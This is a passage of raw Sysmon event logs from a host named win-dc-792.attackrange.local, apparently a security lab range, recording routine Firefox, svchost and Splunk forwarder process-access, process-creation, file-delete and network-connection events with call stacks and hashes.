Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918249Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918248Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918247Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918246Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918245Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918244Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11c2808|C:\Program Files\Mozilla Firefox\xul.dll+296dbe2|C:\Program Files\Mozilla Firefox\xul.dll+2949187|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918243Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+1108cf1|C:\Program Files\Mozilla Firefox\xul.dll+29490f9|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918242Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.311{896A638B-C9AE-6058-4C07-00000000AE01}3420944C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+112c08f|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+202fa|C:\Program Files\Mozilla Firefox\xul.dll+1107bbf|C:\Program Files\Mozilla Firefox\xul.dll+1f6a5|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+1ebdf|C:\Program Files\Mozilla Firefox\xul.dll+11087b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918241Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.307{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918240Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.307{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918239Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.307{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918238Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.307{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918237Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.307{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918236Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.306{896A638B-C9AE-6058-4C07-00000000AE01}34204308C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+4303b|C:\Program Files\Mozilla Firefox\firefox.exe+244f8|C:\Program Files\Mozilla Firefox\xul.dll+c12b3a|C:\Program Files\Mozilla Firefox\xul.dll+1122a14|C:\Program Files\Mozilla Firefox\xul.dll+1120ca2|C:\Program Files\Mozilla Firefox\xul.dll+112d46e|C:\Program Files\Mozilla Firefox\xul.dll+cb8604|C:\Program Files\Mozilla Firefox\xul.dll+4155f|C:\Program Files\Mozilla Firefox\xul.dll+403bd|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+cbe2e2|C:\Program Files\Mozilla Firefox\nss3.dll+f943a|C:\Program Files\Mozilla Firefox\nss3.dll+ecb31|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918235Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.297{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe86.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3420.157.917466005\720245290" -childID 22 -isForBrowser -prefsHandle 6268 -prefMapHandle 8288 -prefsLen 17489 -prefMapSize 228338 -parentBuildID 20210310152336 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3420 "\\.\pipe\gecko-crash-server-pipe.3420" 3040 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2LowMD5=5B68C17D571DCAB4E2FA29EE0DBEC5CB,SHA256=929A1A95196BD1165433CEBF4152A2FAB6EFC3D2EB298E08F8229C5B22AE8DC9,IMPHASH=8FBF1ADBCE9C978414F8FE0722EC7401{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x80000000000000005918234Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.285{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.157.91746600C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918233Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.226{896A638B-B5CA-6058-1300-00000000AE01}3881712C:\Windows\system32\svchost.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918232Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.104{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=47859807C219A6D4971FE95946922AB8,SHA256=20E0D479544526ED286E8BFE009E6274283C22A5910791DB6B993C7EF43FC73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918331Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:47.888{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=981C56DE33635A2FCA87926ECEF85267,SHA256=AE0C15E38A5D57DF0F70102A7FC0F8544F650D4CFE0DEFC039A0DA78FE8EDBC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638654Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:47.350{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68FD354985536E3CD119257F1FA88FC4,SHA256=89C8D3EB84CC18EA9FFDE66DE85CA0479E6D6A143F6A3E7DEE8D4D33E11F2CEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918330Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:47.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918329Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:47.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918328Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.764{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1032-false104.18.26.190-443https 354300x80000000000000005918327Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.606{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1031-false172.217.3.168sea15s11-in-f8.1e100.net443https 354300x80000000000000005918326Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.561{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local51446- 354300x80000000000000005918325Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.506{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1030-false172.217.3.170sea15s11-in-f10.1e100.net443https 354300x80000000000000005918324Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.506{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1029-false172.217.3.170sea15s11-in-f10.1e100.net443https 23542300x80000000000000005918323Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:47.092{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9070232B1B6AA0B43EE6E6E2BD0FA852,SHA256=C3F873FA98FB505799E3F670A1D7C7C94225B8A8D3849A1EFAD56FF735D872E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918351Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:48.897{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428D8980C50C930FC2DD6D2C4A08795C,SHA256=C589C2C9B5B04740E8AF37E889D9FDB4D91F5E45C6D48568CCC2A08711BCE80B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638655Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:48.366{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 